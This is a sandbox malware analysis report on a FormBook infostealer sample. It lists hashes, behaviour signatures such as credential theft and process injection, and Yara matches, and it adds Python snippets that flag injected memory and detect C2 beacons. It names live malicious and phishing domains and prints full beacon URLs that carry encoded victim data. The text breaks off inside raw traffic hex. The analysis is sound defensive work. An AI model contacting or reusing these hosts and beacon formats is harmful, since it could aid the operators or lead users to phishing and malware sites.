Windows Analysis Report
Qte2311.exe

Overview

General Information

Sample Name: Qte2311.exe
Analysis ID: 1345581
MD5: fde8126bd37c19b5f5d3096012ec9300
SHA1: e469f910764853a6282199890585ff90921b0474
SHA256: c3a05d6a46d701f52bad7f04085236bd924e33a7590eca472cf2794cce430374

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Uses runas.exe to run programs with elevated privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: Yara match File source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
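The Yara-matched memory dumps listed above can be triaged from their names alone. The following Python is an added example and not part of the Joe Sandbox report: it parses the dump identifiers, treating the fields as PID, stage, dump id, base address, page protection and allocation type (this layout is an assumption inferred from the values, which line up with the winnt.h PAGE_* and MEM_* constants; the two remaining fields are left uninterpreted), and flags executable regions that are not backed by a loaded image. The sample lines are copied from the report above.

```python
import re
from dataclasses import dataclass

# winnt.h memory constants. The .sdmp field layout assumed here is inferred from
# the values in the report, not taken from Joe Sandbox documentation:
#   <pid>.<stage>.<dump id>.<base address>.<protection>.<?>.<allocation type>.<?>.sdmp
PAGE_PROTECT = {0x01: "NOACCESS", 0x02: "R", 0x04: "RW", 0x08: "WC",
                0x10: "X", 0x20: "RX", 0x40: "RWX", 0x80: "RWXC"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_TYPE = {0x20000: "PRIVATE", 0x40000: "MAPPED", 0x1000000: "IMAGE"}
MEM_IMAGE = 0x1000000

SDMP = re.compile(
    r"(?P<pid>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.[0-9a-f]{8}\."
    r"(?P<mtype>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp", re.IGNORECASE)

# Lines copied from the report's AV Detection section (Yara matches on memory).
REPORT_LINES = [
    "Source: Yara match File source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
]


@dataclass(frozen=True)
class Region:
    pid: int
    stage: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self):
        # Low byte carries the base protection; PAGE_GUARD etc. live above it.
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self):
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def executable(self):
        return (self.protect & 0xFF) in EXECUTABLE

    @property
    def injection_candidate(self):
        # Executable memory not backed by a loaded module is what a mapped or
        # written-in payload looks like; legitimate code lives in MEM_IMAGE.
        return self.executable and self.mem_type != MEM_IMAGE


def parse_region(text):
    """Return a Region for the first .sdmp identifier in text, else None."""
    m = SDMP.search(text)
    if not m:
        return None
    return Region(int(m["pid"], 16), int(m["stage"], 16), int(m["base"], 16),
                  int(m["protect"], 16), int(m["mtype"], 16))


def regions_from_report(lines):
    return [r for r in map(parse_region, lines) if r is not None]


def injection_candidates(lines):
    return [r for r in regions_from_report(lines) if r.injection_candidate]


def summarize(lines):
    """One human-readable line per region, marking the suspicious ones."""
    return [f"pid {r.pid} base 0x{r.base:08X} {r.protect_name} {r.type_name}"
            + (" <-- injection candidate" if r.injection_candidate else "")
            for r in regions_from_report(lines)]


if __name__ == "__main__":
    print("\n".join(summarize(REPORT_LINES)))
```

Run against the report, six of the eight Yara-matched regions come out as RWX and not image-backed: the 0x400000 private region in Qte2311.exe (PID 3) is the unpacked payload in the original process, while the hits in runas.exe (PID 5) and the two SoZyKEDyfEWrMWEFcBvwSAkabc.exe instances (PIDs 4 and 6) are RWX MEM_MAPPED regions, which is what the "Maps a DLL or memory area into another process" signature is describing. The two PAGE_READWRITE private regions in PID 5 are data (configuration or decrypted strings), not code, and are the ones to dump for IOC extraction rather than for disassembly.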
Source: http://www.drtonks.com/ Avira URL Cloud: Label: phishing
Source: http://www.rva.info/u0t4/ Avira URL Cloud: Label: malware
Source: http://www.drtonks.com/u0t4/?ipNhfX=yeZb8GK9kb308m6tqpQSWKVePpKokD/DhHuephdMkCBCe/gXfDvon4YRbmogRZs51d24yXmjv9s2GuQK2J30uG9jNiVx5pUDTA==&DDMD=2V_pWNT8ifT Avira URL Cloud: Label: phishing
Source: http://www.owcojyyde.best/u0t4/?ipNhfX=T+ktEIOjX9T5dGcj9rUsXIa48WZT28SiLvO+yVBZwvWEp9g0wSKFlyHjxBvBWF4XQFrqNUOHqhRxKaY3zbxWdu06McXUafUYdA==&DDMD=2V_pWNT8ifT Avira URL Cloud: Label: malware
Source: https://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK Avira URL Cloud: Label: malware
Source: http://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK+dlDXWJ9cmev8ZYmFh9Bk+wzUoT6TgNjxSlOMQ==&DDMD=2V_pWNT8ifT Avira URL Cloud: Label: malware
Source: http://www.owcojyyde.best/u0t4/ Avira URL Cloud: Label: malware
Source: www.drtonks.com Virustotal: Detection: 8% Perma Link
Source: www.rva.info Virustotal: Detection: 14% Perma Link
Source: www.arteunmapa.com Virustotal: Detection: 5% Perma Link
Source: www.02omn1.cfd Virustotal: Detection: 10% Perma Link
Source: http://www.drtonks.com/ Virustotal: Detection: 8% Perma Link
Source: http://www.rva.info/u0t4/ Virustotal: Detection: 13% Perma Link
Source: Qte2311.exe Joe Sandbox ML: detected
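The C2 URLs above share a fixed path (/u0t4/) and query layout across three different hosts, and the DDMD value never changes. The following Python is an added example and not part of the report: it learns that structure from the report's URLs, compiles a regex that matches the beacon on any host, and runs it over a few constructed proxy log lines (the hosts www.newhost.test, cdn.example.test and www.example.test are invented for the example). FormBook cycles through a list of candidate domains of which most are decoys, and the string of 404 responses further down is consistent with that, so a structural match on a host the report does not name is worth more than a hit on the domain list alone.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# URLs copied from the report's AV Detection section; the https://www.rva.info
# entry is truncated there and is kept truncated here.
REPORT_URLS = [
    "http://www.drtonks.com/u0t4/?ipNhfX=yeZb8GK9kb308m6tqpQSWKVePpKokD/DhHuephdMkCBCe/gXfDvon4YRbmogRZs51d24yXmjv9s2GuQK2J30uG9jNiVx5pUDTA==&DDMD=2V_pWNT8ifT",
    "http://www.owcojyyde.best/u0t4/?ipNhfX=T+ktEIOjX9T5dGcj9rUsXIa48WZT28SiLvO+yVBZwvWEp9g0wSKFlyHjxBvBWF4XQFrqNUOHqhRxKaY3zbxWdu06McXUafUYdA==&DDMD=2V_pWNT8ifT",
    "http://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK+dlDXWJ9cmev8ZYmFh9Bk+wzUoT6TgNjxSlOMQ==&DDMD=2V_pWNT8ifT",
    "https://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK",
    "http://www.rva.info/u0t4/",
    "http://www.owcojyyde.best/u0t4/",
]
# Domains the report lists with VirusTotal hits but without a full URL.
REPORT_DOMAINS = ["www.arteunmapa.com", "www.02omn1.cfd"]

# Constructed proxy log lines for the example (not from the report).
PROXY_LOG = [
    "2023-11-21T03:46:15Z 10.0.0.7 GET http://www.drtonks.com/u0t4/?ipNhfX=AAAA/BB==&DDMD=2V_pWNT8ifT 404",
    "2023-11-21T03:47:01Z 10.0.0.7 GET http://www.newhost.test/u0t4/?ipNhfX=CCCC&DDMD=2V_pWNT8ifT 200",
    "2023-11-21T03:47:30Z 10.0.0.9 GET http://www.drtonks.com/ 200",
    "2023-11-21T03:48:00Z 10.0.0.7 GET http://cdn.example.test/u0t4/?ipNhfX=x&DDMD=other 200",
    "2023-11-21T03:48:05Z 10.0.0.9 GET https://www.example.test/ 200",
]


def learn_beacon_signature(urls):
    """Derive the parts shared by the report's beacon URLs: the campaign path,
    the query keys in order, any key whose value never changes across hosts,
    and the hosts seen."""
    parsed = [urlsplit(u) for u in urls]
    paths = {p.path for p in parsed}
    if len(paths) != 1:
        raise ValueError(f"expected one campaign path, got {paths}")
    queries = [parse_qsl(p.query, keep_blank_values=True) for p in parsed if p.query]
    keys = [k for k, _ in max(queries, key=len)]  # longest query is untruncated
    constants = {}
    for k in keys:
        values = {v for q in queries for kk, v in q if kk == k}
        seen_in = sum(1 for q in queries if any(kk == k for kk, _ in q))
        if len(values) == 1 and seen_in >= 2:
            constants[k] = values.pop()
    return {"path": paths.pop(), "keys": keys, "constants": constants,
            "hosts": sorted({p.hostname for p in parsed})}


def beacon_regex(sig):
    """Regex for a complete beacon URL on any host: fixed path, same key
    order, constant values pinned, variable values left free."""
    parts = [re.escape(k) + "=" + (re.escape(sig["constants"][k]) if k in sig["constants"] else r"[^&\s]+")
             for k in sig["keys"]]
    return re.compile(r"^https?://(?P<host>[^/\s]+)" + re.escape(sig["path"])
                      + r"\?" + "&".join(parts) + r"$")


def scan_proxy_log(lines, sig):
    """Return (line number, host, reason) for lines matching the beacon
    structure on any host, or touching a host the report already names."""
    rx = beacon_regex(sig)
    known = set(sig["hosts"]) | set(REPORT_DOMAINS)
    hits = []
    for n, line in enumerate(lines, 1):
        url = next((tok for tok in line.split() if tok.startswith(("http://", "https://"))), None)
        if url is None:
            continue
        host = urlsplit(url).hostname or ""
        if rx.match(url):
            hits.append((n, host, "known C2 host, beacon pattern" if host in known
                         else "beacon pattern on new host"))
        elif host in known:
            hits.append((n, host, "known host from report"))
    return hits


if __name__ == "__main__":
    signature = learn_beacon_signature(REPORT_URLS)
    print(beacon_regex(signature).pattern)
    for hit in scan_proxy_log(PROXY_LOG, signature):
        print(hit)
```

The learned regex pins the path and the DDMD value while leaving the ipNhfX payload free, so the second constructed line (a host absent from the report) is flagged on structure alone, the bare request to www.drtonks.com/ is flagged only because the host is on the list, and the cdn.example.test request with a different DDMD value is left alone. The ipNhfX value is where FormBook carries the encrypted victim data, so it is not usable as a constant and should be pulled out of matching requests for decryption rather than matched on.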
Source: Qte2311.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Qte2311.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: firefox.pdbP source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdb source: Qte2311.exe
Source: Binary string: runas.pdbGCTL source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110534706.000000000099E000.00000002.00000001.01000000.0000000C.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4110753572.000000000099E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Qte2311.exe, Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: runas.pdb source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdbSHA256 source: Qte2311.exe
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FABB80 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FABB80
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02FA13F0
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then xor eax, eax 5_2_02F997C0
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02FA13EF
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02FA13DD
Source: C:\Windows\SysWOW64\runas.exe Code function: 4x nop then pop edi 5_2_02F9DCDA
Source: Joe Sandbox View IP Address: 217.160.0.131 217.160.0.131
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://majinfo.tech/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 21 Nov 2023 03:46:15 GMTData Raw: 31 33 36 36 0d 0a c0 d7 24 a2 9a f6 43 44 14 f3 01 d0 48 59 38 7f 7f 84 0c 73 ff 6f 4b ab b3 7d 39 29 ca 6b 07 75 09 01 de 48 e1 a2 d7 2d b5 f6 2c 71 c6 4f 88 0f 56 22 24 46 fa 78 69 8a 73 ad ea 3f 9f 17 7b cb a6 30 55 c5 21 d2 c9 bc fe b4 d0 8e 19 0f 16 75 da bd fe 77 bf 2f fd 16 48 0a c0 99 29 a2 2a 1f 3f ae ad 4a 5e 22 3e 89 21 a2 24 37 8f 3e 0c 00 fe 2d fe 59 40 2a a2 ae 30 b8 40 a8 fc c8 15 72 6b 5c 1f 63 fb 53 40 14 70 2b b3 c7 d0 f5 bf 5c a5 09 b6 93 3b b3 5a 40 9d af e6 b3 37 47 ec cc f9 ab fe 66 25 05 1b 7f fa 40 49 ef a1 d1 97 92 ba b6 20 47 c4 3e 14 49 e2 da 5e 74 90 d8 70 4b 11 27 05 59 7f 35 9f cd c6 58 57 1d a5 0f 80 25 d5 0e ea 5d ca ca 0e 4a aa 51 06 ca 33 39 d4 ba a9 e4 af 11 27 47 83 af 1a 07 25 0d 94 19 25 75 e4 8c b6 2f c4 83 29 69 ef 5d a3 0d 0c 69 7c 8e 50 24 49 db f5 ad 70 be 4d 2e 8d 4d 32 4c e6 64 52 c9 ac 73 46 b2 4a fc 9f 44 1e 7a d4 9d fe 47 a2 76 96 54 57 f2 5e da 17 f2 a7 c4 23 89 a3 3a 0f 2f ed 4b 27 f1 78 81 00 1c e4 44 58 0f 06 35 1a f8 ea ad 6c 81 fc e5 90 2c db fe 60 48 4c 3a f9 ac 6d e3 04 82 3a 4e ae c6 ab b2 38 bd 43 ad 9b 82 6e 10 27 d6 2d ef df 19 dd 93 93 d7 0c 9f c6 29 69 e0 3b 0b ec e1 d3 87 94 85 30 9c a0 45 90 1d 40 1e 58 53 8d e4 e5 a3 26 45 08 54 26 19 5c 9c 1c 3b 8d 67 8d 08 be 50 d2 d7 0c cc 33 0c 5d 27 fd f5 b0 d0 c8 59 76 d0 9d 6c 01 5d 6b e6 ed 61 fa 85 c9 08 5e 7b 28 a9 41 94 35 f5 ab e7 e0 ac 8d 7c 36 2f ed 4b dc 49 3c c6 41 1d a1 93 f4 ab 91 7e 13 5a da 05 69 a1 6b 18 a0 96 70 be a5 9c 7e 33 75 40 11 5a 3c 8e f4 1b 31 84 16 74 42 41 9f 94 d3 6f 74 8d ca a5 6a 6c 72 db 03 a2 34 3c b8 82 fe f9 03 f9 d6 68 f2 
9b 7c 01 4f 27 4e 71 f6 fc 0b aa 0f 1a e1 91 ec 9d 34 4b 28 a7 83 37 01 33 01 8a 7c 98 2c a8 cd c5 c8 78 ee c4 a9 b6 f9 50 08 2d b2 0c d1 ed 8b de ca 36 fb f6 0c 55 ef 88 79 64 22 af 42 88 fb 10 a7 3a bc 95 1e 1f 1a fe 48 2a c8 bc 27 3f 4d 6f 12 65 b0 7e 95 2f 18 12 d3 df c2 bf 9c af df 7a 08 81 7c f8 f1 81 4c 13 89 5e 0c f3 8c c7 eb ae b6 21 be 42 03 c9 a8 8e 77 b9 8f 93 3b 3e 2c 77 1a 47 b1 dc a0 b9 af a2 7f c2 5c 98 8b 90 83 4c ee f8 81 e4 27 80 3a a7 e3 63 fe bf d5 00 d4 09 0d 7b 31 7e ef ba 0e 2c 06 26 48 11 c3 71 43 92 fa ac 71 92 9e f4 b2 05 23 af e0 0f f2 59 5e 06 6f 48 49 ac a2 9b 73 1f 9f 9c 86 25 f9 6b b7 c5 f2 59 5e 44 7f ec bf a6 3b 62 97 71 6b 5c 25 cd c1 3a ab 80 94 84 36 cb 6a bd c9 2a 99 6e c0 4f db 00 fe 04 fe 80 ba 03 52 92 2c 4f d3 cd ea 7e 95 6f c8 76 d6 e1 b0 94 d2 ee 4b 42 83 24 75 c3 9e 0f ba 86 21 05 ef 67 20 25 19 69 ef 02 1e f0 da 43 a0 c5 a3 4b 14 e5 54 f9 bb 7b e2 f4 30 40 9f e5 d0 ea 13 78 5a 34 d2 04 e0 b4 93 97 43 31 38 5f 5a 64 59 9e 72 3a 6d 7b 69 3c 54 1e e4 cb f4 2c bb 4e 8b
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://majinfo.tech/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 21 Nov 2023 03:46:19 GMTData Raw: 31 33 36 37 0d 0a c0 d7 24 a2 9a f6 43 44 14 f3 01 d0 48 59 38 7f 7f 84 0c 73 ff 6f 4b ab b3 7d 39 c9 ca 6b 07 75 84 00 af 09 2e 7a dd 52 6b cf 12 67 fc 84 f8 60 25 42 62 a4 8f 97 a6 38 d7 aa fe f3 79 b1 b7 6c 0a 53 55 1c 22 9d cc eb 4f 0b ed 98 f1 60 51 a7 dd eb 7f f7 fb d2 6f 81 a4 00 9c 99 22 aa f2 f1 e3 da aa e4 25 e2 93 18 22 4a 72 f3 e8 c3 00 e0 df e2 9f 05 a4 22 ea 0a 83 0b 84 ca 8f 5c 21 b7 c6 f5 31 b6 3f 05 44 01 b7 32 7b 0c 5d ff cb 55 9a 60 3b b9 33 a9 05 d4 f9 6a 3a 79 73 c4 d6 9c bf ea 6f 56 50 b0 f1 a7 0f 94 74 1e 6a 7d 29 a8 6b 72 72 44 ec 42 9e 24 ae e9 44 0b 89 0d 37 14 71 52 90 d5 57 d3 c9 6c 8c 75 d5 51 fa 00 58 50 ed a0 de a5 ac 6c a1 a0 1a 65 a0 3c 93 43 ad 9b 0a fe 1a 71 72 34 f8 aa 71 50 d2 40 91 51 52 47 ce 68 fb 4a 3c 98 82 76 de d5 da c0 90 c6 e7 08 79 92 34 6d d7 08 e7 9b e4 52 db 24 c3 64 4e 26 95 cc 3a 67 24 ab c4 ff 49 e4 b1 43 dd ea 7f 24 6a 67 49 79 25 ef a5 7d 25 7f 4a 3c 92 38 aa f3 f0 d2 be b6 12 8f 17 08 c0 41 4e 84 f5 60 50 a3 81 af de ca 06 c8 5f 0e c9 b2 ed 0f 86 c4 a4 95 2f da d6 4e 20 a8 e3 e4 6a bc 2a 8b d3 3b d4 ba 29 e8 06 71 62 dd f2 fe 9d d1 3d 39 79 cd f0 69 9c 92 06 be b3 c0 1e 3e 7d 48 59 08 c3 09 5a 04 d9 01 e4 81 35 d5 48 5e 3e 6a 52 84 40 65 92 c1 c5 c9 b1 d3 78 d6 88 e0 73 25 7d c5 c0 3c 43 df b6 d2 5f 0f 0b 8d 9c 65 07 dd ca 06 d0 b5 66 de 1e a6 5f 98 8c e0 b5 83 82 1a 44 59 53 dd bd 04 67 6d e4 b3 79 69 5f e3 56 e2 31 0e ea 08 ad a4 5f 0d f4 9b d0 d2 2e 48 73 5d c3 00 b5 84 f3 0d e5 f4 9b a9 03 8a d0 fc 69 a0 df 88 21 34 a7 13 0a fa a4 9c 7e a3 2b 54 2e 55 63 93 9b 0e 10 a5 e1 c1 e5 f4 cf 1f c8 b7 46 93 df 
e4 2b 78 3a 72 8a b3 e7 5f 50 7e d0 08 8f 64 ef a4 59 42 39 ed bd 09 98 09 50 e4 c3 64 41 6d ce 07 c6 73 47 4e b5 cd 87 42 68 9e 65 88 6e 5f f4 56 36 d9 37 67 28 3b 47 cc 23 13 79 15 42 dc 87 38 d5 e1 ad f4 f8 58 f3 47 52 41 e6 3d f9 79 7c 93 28 83 f5 ab 7c c1 90 98 fe 16 fe e5 7c f5 d6 43 08 e4 c3 8f 8f 64 9a 48 f4 62 98 66 3c 5e b7 95 0d f1 15 1a 48 46 75 bc cd 7d 9c dc f2 61 b9 d5 38 8a e5 06 cd 7d 15 fd 13 e6 c2 5c 84 1c 64 72 c7 0f 24 3f 01 54 39 1d 1f f3 ff ad 1a a0 4a 68 d8 8b f1 7b d7 b6 60 31 30 41 8a 18 8e 1b 92 d4 67 8d 93 f4 a4 93 0d 18 79 05 7f 90 2f f2 d2 7b 43 0a 62 15 dd 9c bb f8 e4 34 2c c9 5f bb 2d 96 2f f2 22 ba 63 f7 35 dd 11 bb 8c 1b e3 4a 69 0e d6 59 05 a4 20 b4 5e 94 ab 75 56 ca 74 0d 7e da 06 f0 27 f0 07 d4 2d 90 82 64 db 34 5d 2f ef 97 db 07 b2 9d 75 38 2c a5 b4 fb 82 d0 20 49 dd b0 e7 83 ae 60 48 c1 fb 19 48 41 06 da b9 80 07 bc 76 10 68 fe e4 12 45 39 55 fe ee 9e 39 3d 0c d0 67 39 34 fa 04 9e e6 b5 34 01 38 6d e5 e5 50 0c ce 97 e6 59 b6 4d 39 9d b6 bd 34 1e 4a 0f f2 75 7a 96 5d a7 f9
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://majinfo.tech/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Tue, 21 Nov 2023 03:46:21 GMTData Raw: 31 33 36 37 0d 0a c0 d7 24 a2 9a f6 43 44 14 f3 01 d0 48 59 38 7f 7f 84 0c 73 ff 6f 4b ab b3 7d 39 29 ca 6b 07 75 09 01 5e 53 b8 e8 75 4b ad 3d 4b 9c f1 13 e2 03 4a 84 c4 48 1f 2f 4d 71 ae 55 fd e7 f3 62 6f d9 14 a6 aa 38 44 3a 99 d7 9f 16 da 31 e3 c1 a2 4e bb d7 ff ee f7 a5 df 02 49 01 38 33 45 54 e5 e3 c7 b5 55 c9 4b c4 27 31 44 94 e4 e6 d1 87 01 c0 bf c5 3f 0b 48 45 d4 15 06 17 08 95 1f b9 42 6e 8d eb 63 6c 7f 0a 88 02 6e 65 f6 18 ba fe 97 ab 34 c1 76 72 67 56 0b a8 f3 d5 7c f6 a6 c5 ce 9c bf ea 6f 56 50 b0 f1 a7 0f 94 f4 1e 6a 7d 29 a8 6b 72 d2 22 f6 21 4f 12 d7 f4 a2 83 c4 86 5b 8a 38 29 c8 ea ab f9 6c 36 c6 ba aa 95 3e 00 16 54 3b a8 77 29 2b 3b 28 a8 46 19 28 cf e4 50 eb a6 82 bf 46 9c 1c 0d be 6a 1c 94 34 50 64 94 d4 91 33 da be 10 0f a6 a0 bd 77 b5 36 30 a4 f1 39 42 9e 24 4d d7 37 c2 f9 26 b9 d4 36 c9 30 99 93 49 25 b3 ce 19 c9 2a f1 7f 12 79 e8 51 77 fa 1f 89 da 59 52 5e c9 7b 69 5f c8 9f 12 5b 12 47 75 1e 5e da 97 4e 62 7b 81 00 1c e4 44 58 0f 06 35 1a f8 ea ad 6c 80 fc e5 90 2c db fe 60 48 4c 3a f9 ac 6d ed 04 82 6a 27 57 e3 55 59 9c de a1 d6 4d 41 37 88 13 eb 96 f7 ef 8c ee c9 c9 6b 86 4f e3 94 34 f0 9d 05 f6 f8 e9 43 ca 42 18 4e d0 22 c8 0e 20 0f ac a9 46 f2 f2 51 93 22 04 2a 93 0c 2e 4e 8e 9d c6 b3 46 04 9f 2b e9 2b 06 e6 19 86 ae 93 fe 7a 5c 68 e4 2c 3b ea 4e 36 80 ae 35 f3 f6 30 fd c2 64 04 af 3d 14 d4 20 ca 9a ea d5 73 70 d6 46 3e 9b 97 f6 25 ee 24 b6 71 50 2d 74 92 7e 35 d2 6f 42 4b bb 20 cd 75 0d 03 d4 12 ce 37 94 d3 6f a6 0e 28 42 f3 c7 91 7e 23 86 d0 9c 4e 28 e8 93 72 fa 8d ae 50 b9 54 8d 4d 6e 7b 40 94 86 07 97 d3 3f 7f 20 df 1a 4d 7e 93 
